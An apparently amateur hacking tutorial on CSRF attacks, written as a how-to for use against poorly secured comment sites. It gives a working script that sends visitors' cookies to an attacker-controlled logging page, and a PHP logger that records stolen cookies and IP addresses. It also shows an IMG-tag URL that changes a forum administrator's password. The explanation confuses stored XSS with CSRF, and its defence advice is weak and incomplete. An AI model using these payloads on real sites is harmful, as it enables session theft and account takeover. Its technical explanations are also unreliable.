CSRF(Cross-Site Request Forgery) / XSRF Attacks

In this tutorial I'll be discussing how a CSRF or XSRF attack works.
The method is called both CSRF and XSRF. CSRF stands for Cross-Site Request Forgery; in XSRF the X stands for "cross", just like in XSS (Cross-Site Scripting).

I will be calling the method CSRF for the rest of the tutorial, because I prefer that term.

Table of Contents:

    1) What is Cross-Site Request Forgery?
    2) How do I find CSRF vulnerabilities?
    3) How to take advantage of the IMG tag?
    4) Keep it Simple
    5) Securing yourself against CSRF
    6) Conclusion

1) What is Cross-Site Request Forgery?

I just told you what CSRF stands for, so there's no need to say it twice ^^.

When performing a CSRF attack you inject code into a webpage, for example on a forum or any other website where you can post comments. The idea is that an HTTP request is executed as soon as a user visits the affected webpage. Because the attack takes place on the victim's side (client-side), the request is sent from the machine of the victim who visits the page. If, for example, a user is logged in to YouTube, a link can be crafted and hidden on a forum that logs them out of YouTube.

We can go much further than this by, for example, making a request to a webpage that, upon visiting, makes a few other requests using JavaScript. This could be used to steal information from websites the user is logged in to.

2) How do I find CSRF vulnerabilities?

CSRF vulnerabilities are often found on webpages with low security that allow everyone to make posts and comments (guests can comment). The fun part is that you can create a post that is seen by everyone visiting that page.

It does have to be possible to use HTML or BBCode, though.

The IMG Tag

An IMG tag in HTML (<img>) is usually used like this:

Code:
<img src="http://website.com/myimage.jpg">

As you may know, PHP pages can also return images, which makes the following possible:

Code:
<img src="http://website.com/my_php_page.php">

If my_php_page.php returns an image, the IMG tag will display it.

3) How to take advantage of the IMG tag?

So how do we actually do it? As I said, PHP pages can also return images. Consider this simple scenario:

You've just found a webpage where you can post comments and use HTML inside them. The website does not check the Referer header, and a PHP URL is accepted as the src of an IMG tag. You write some PHP code that returns an image but at the same time executes some JavaScript that sends the victim to another page. When someone visits the page where you used the IMG tag, a picture is shown, but the JavaScript runs as well. This way you can steal cookies, for example, or even write and post comments under somebody else's name.

Pretend we have the following code:

PHP Code:
<html><head><script type="text/javascript">
    // Build the request object and, if the browser supports it, send the
    // visitor's cookies as a GET argument to the logging page.
    var http = GetXmlHttpObject();
    if(http != null)
    {
      var url = "http://mywebsite.com/cookiestealer.php?cookie=" + document.cookie;
      http.open("GET", url, false);
      http.send(null);
    }

    // Returns an XMLHttpRequest object, with a fallback for old IE versions.
    function GetXmlHttpObject()
    {
      if(window.XMLHttpRequest)
      {
        return new XMLHttpRequest();
      }
      if(window.ActiveXObject)
      {
        return new ActiveXObject("Microsoft.XMLHTTP");
      }
      return null;
    }
</script></head></html>

Note: in this case I did not write PHP code to display an image. This is plain HTML/JS that makes an HTTP request to a certain page.

If you're a little familiar with JS you can see that an HTTP GET request is made to the page mywebsite.com/cookiestealer.php, with a GET argument whose value is document.cookie. document.cookie always contains the cookies of the page where the JavaScript is being executed, so in this case it is the cookie of the user visiting the page that gets stolen.

On the website I've found I've uploaded the following code:

PHP Code:
<?php
    // Cookie value sent by the JavaScript above, plus the visitor's IP address.
    $cookie = $_GET['cookie'];
    $ip = $_SERVER['REMOTE_ADDR'];

    // Append both to the log file.
    $fh = fopen("log.txt", 'a') or die("can't open file");
    fwrite($fh, $cookie . "\n" . $ip . "\n\n");

    fclose($fh);
?>

This PHP code reads the value of the GET argument and the IP address of the person visiting your page, and appends both to the file called 'log.txt'.

Every time someone visits the page where I posted the IMG tag pointing at the page that executes the JS code, the code requests the cookiestealer with the cookie placed in the GET argument.

At last, you can watch the cookies flow into your log. ^^

4) Keep it Simple

The code above is a fairly extensive example. Badly secured websites with bad software have even bigger bugs than that.

For example, you can first install the forum software on your local machine and look at which HTTP GET request you have to make to change the administrator's password. Pretend it's the following:

Code:
http://forum.com/admincp/change_admin_pass.php?newpass=mynewpass123

You'd then send that URL to the administrator in a private message, inside an IMG tag. When the administrator reads the message, a request is made to the above URL and the admin password is changed to mynewpass123.

I have to say, it's often a lot harder than the above example. ^^

5) Securing yourself against CSRF

You can protect yourself against CSRF attacks by, for example, not loading images at all. I think that is a bit much, so I'm thinking about making an add-on that blocks all images that don't have an image extension, unless you explicitly allow them of course.

6) Conclusion

So what is a CSRF attack? A CSRF attack is one that can be performed with little effort, if you know what you're doing, and can do a lot of damage. Protecting against CSRF attacks is harder, but worth doing if you're working on, for example, a CMS.



Thank you (zer0w0rm)

Published By : Zer0w0rm
